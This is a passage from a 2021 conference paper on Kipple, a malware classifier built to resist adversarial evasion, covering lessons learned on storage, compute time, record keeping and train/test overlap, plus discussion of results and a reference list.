sans any specific adversarial ML techniques (though some of their action space did overlap with
the techniques in MalwareRL).


7     Lessons Learned
As a smaller side-effort, we encountered and overcame many barriers in developing Kipple that
those more unfamiliar with the field would likely also run into. As part of our goal to enrich the
research community, we report on several of these roadblocks, how we overcame them, and tips
for others looking to conduct similar research. While many of these may seem obvious at first
glance, for those just getting their feet wet these lessons may not be immediately intuitive.

7.1     Space Requirements
Kipple was initially to be built on a small (<30GB) Linux virtual machine run on a personal
computer. This quickly became problematic – between the large size of EMBER/massive size
of SoReL, the needed Python/other libraries, and space requirements to save newly generated
variants, 30GB became too small fast. While we ultimately increased the space allotted to the
VM developing Kipple, some of the early decisions influenced the course of the project; and even
once the VM’s space was enlarged, we still found ourselves running out of storage. Ultimately
Kipple was allocated roughly 300GB of space, which appears sufficient for most operations.

Recommendation. We recommend researchers start with at least 200GB of space if possible
when conducting adversarial malware research, with more preferred. Additionally, using VMs in
a cloud environment will likely make storage less of a problem as opposed to local hardware.

7.2     Time Allocation
Time played a key role in the development of Kipple: many of the ideas of the project were
straightforward, but were hard to test due to needed computation time and other difficulties.
Indeed, many issues compounded as we intended to deliver Kipple as part of the 2021 MLSEC
event which had a strict submission deadline. Some example issues include:

     • Long-running code or scripts containing typos or mistakes at the end;

     • Long computation time(s) for building new classifiers and models;

     • Needing more time to construct adversarial examples; and

     • Rate limiting for downloading malware samples.

Ultimately we tried to mitigate these as best we could, but often many of experiments we ran for
Kipple would need to be configured late in the evening and run overnight, with some days lost
due to typos or other issues.


    Proceedings of the Conference on Applied Machine Learning for Information Security, 2021
Kipple: Towards accessible, robust malware classification                             A. Applebaum


Recommendation. Understand that adversarial malware research may be time intensive.
Attempt to parallelize your work and research whenever possible; strongly consider using cloud
infrastructure if you can. Setup pipelines to run consecutive jobs and let the code run on its own
when you aren’t needed. Review your code for bugs before running, and consider letting your
long jobs run for a few minutes before stepping away.
    One other recommendation to help save on time is to avoid duplicative computation. As an
example, when training a new model, we would always convert each adversarial sample into its
feature vector during training, requiring a significant amount of time once we generated many
samples and had multiple models to test. Eventually we developed a storage system where upon
generation we would store the feature vector for a new adversarial sample, thereby bypassing the
need to convert the sample for each of the models we wanted to train. This approach itself was
time consuming to implement, but saved many hours of computation time further down the road.

7.3     Record Keeping
We tried many different implementations for Kipple, ranging from choosing different LGBM
parameters to training on different data sets. Unfortunately, we ran into issues keeping records of
some of our models, parameters, and other training information. This ended up slightly hurting
our efforts, as in some cases we did not have exact information regarding a model we built a
week before, or we needed to reproduce something due to a small code mix-up. Much of this
was the result of fighting time and storage issues, where we would implement something quickly
without following good practices; in these cases, even when the outcome was positive, we still
had to invest more time figuring out how to fix our implementation than if we would have done
it correctly the first time.

Recommendation. Good coding practices help: use version control when possible, label
variables well in your code, and label all files/models/others to be descriptive. Keep track of all
important information, and backup often.

7.4     Data Robustness
Perhaps the most surprising result from our experiments was the accuracy of each model on
the test data sets we created for the adversarial samples. This came as a shock initially, first
indicating that the models were extremely effective – however, we ultimately realized that the
accuracy came as a result of training/testing overlap, where variants of individual samples wound
up in both the training and testing sets, thereby allowing the classifier to “see” example test data
while training.

Recommendation. Identify training and test sets early, and try to identify any overlap
between the two early in the process. Make sure to include at least one data set that appears
disjoint from the training data.


8     Discussion and Future Work
We close out this paper with a discussion of some of our major results as well as identifying
different areas for future work. One immediate noteworthy result was the high rate of evasion for
the adversarial examples produced in Section 3. Even though these were produced to be evasive
against MalConv – a classifier using a very different architecture – they still were effective against
our GBDT classifier in Section 4. The transferrability of adversarial examples is an interesting
area of study, and we hope that these results can help inform future areas of research; anecdotally,


    Proceedings of the Conference on Applied Machine Learning for Information Security, 2021
Kipple: Towards accessible, robust malware classification                            A. Applebaum


we found that many of the samples produced locally also transferred to the other models as part
of the MLSEC attacker challenge.
     Another notable result from Kipple is the effectiveness of the portfolio classifier versus the
adversarially retrained one. While the difference is perhaps not terribly large in performance, the
portfolio did seem to do convincingly better on the MLSEC data set. The final Kipple model,
while not bulletproof, was successful in stopping a large amount of evasion attacks. We believe
that a future approach could leverage more data and additional training modules to make the
solution even more robust.
     Finally, we note that one of our original hypotheses was that the existing benign and malware
would be sufficiently different than our own generated adversarial samples to provide effective
training data in building a new classifier. Interestingly we found evidence both for and against this
hypothesis: for the adversarial, variants, and msf models it was clear that benign outperformed
all, but for the undetect model our hypothesis was indeed true and all outperformed benign. We
believe that this, as well as the efficacy of training on strictly evasive samples, is an interesting
area for further research.


9     Code Availability
As part of this project, we have released all of the code behind Kipple online: https://github.
com/aapplebaum/kipple. This includes code to train and evaluate models, the adversarial
variants we generated, and the models themselves. We hope that this release will help encourage
future research in this area.


References
 [1] H. S. Anderson and P. Roth. EMBER: An Open Dataset for Training Static PE Malware
     Machine Learning Models. ArXiv e-prints, Apr. 2018.

 [2] H. S. Anderson, A. Kharkar, B. Filar, D. Evans, and P. Roth. Learning to evade static pe ma-
     chine learning malware models via reinforcement learning. arXiv preprint arXiv:1801.08917,
     2018.

 [3] Andy Applebaum. Trying to make meterpreter into an adversarial example. url: https:
     //www.camlis.org/2019/talks/applebaum, 2019.

 [4] Bobby Filar. MalwareRL, 2021. URL https://github.com/bfilar/malware_rl.

 [5] S. Chen, N. Carlini, and D. Wagner. Stateful detection of black-box adversarial attacks. In
     Proceedings of the 1st ACM Workshop on Security and Privacy on Artificial Intelligence,
     pages 30–39, 2020.

 [6] L. Demetrio and B. Biggio. secml-malware: A python library for adversarial robustness
     evaluation of windows malware classifiers, 2021.

 [7] L. Demetrio, B. Biggio, G. Lagorio, F. Roli, and A. Alessandro. Explaining vulnerabilities
     of deep learning to adversarial malware binaries. In ITASEC19, volume 2315, 2019.

 [8] L. Demetrio, B. Biggio, G. Lagorio, F. Roli, and A. Armando. Functionality-preserving
     black-box optimization of adversarial windows malware. IEEE Transactions on Information
     Forensics and Security, 2021.

 [9] Fabrício Ceschin and Marcus Botacin. Adversarial Machine Learning, Malware Detection,
     and the 2021’s MLSEC Competition, Sept. 2021.


    Proceedings of the Conference on Applied Machine Learning for Information Security, 2021
Kipple: Towards accessible, robust malware classification                        A. Applebaum


[10] R. Harang and E. M. Rudd. Sorel-20m: A large scale benchmark dataset for malicious pe
     detection, 2020.

[11] W. Hu and Y. Tan. Black-box attacks against rnn based malware detection algorithms. In
     Workshops at the Thirty-Second AAAI Conference on Artificial Intelligence, 2018.

[12] B. Kolosnjaji, A. Demontis, B. Biggio, D. Maiorca, G. Giacinto, C. Eckert, and F. Roli.
     Adversarial malware binaries: Evading deep learning for malware detection in executables.
     In 2018 26th European signal processing conference (EUSIPCO), pages 533–537. IEEE, 2018.

[13] H. Li, S. Zhou, W. Yuan, J. Li, and H. Leung. Adversarial-example attacks toward android
     malware detection system. IEEE Systems Journal, 14(1):653–656, 2019.

[14] A. Mosquera. amsqr at MLSEC-2021: Thwarting Adversarial Malware Evasion with a
     Defense-in-Depth, Sept. 2021. URL https://doi.org/10.5281/zenodo.5534783.

[15] Nicholas Carlini. On evaluating adversarial robustness. url: https://www.camlis.org/
     2019/keynotes/carlini, 2019.

[16] Phil Roth. Ember improvements. url: https://www.camlis.org/2019/talks/roth, 2019.

[17] E. Raff, J. Barker, J. Sylvester, R. Brandon, B. Catanzaro, and C. K. Nicholas. Malware
     detection by eating a whole exe. In Workshops at the Thirty-Second AAAI Conference on
     Artificial Intelligence, 2018.

[18] I. Rosenberg, S. Meir, J. Berrebi, I. Gordon, G. Sicard, and E. O. David. Generating end-to-
     end adversarial examples for malware classifiers using explainability. In 2020 International
     Joint Conference on Neural Networks (IJCNN), pages 1–10. IEEE, 2020.


  Proceedings of the Conference on Applied Machine Learning for Information Security, 2021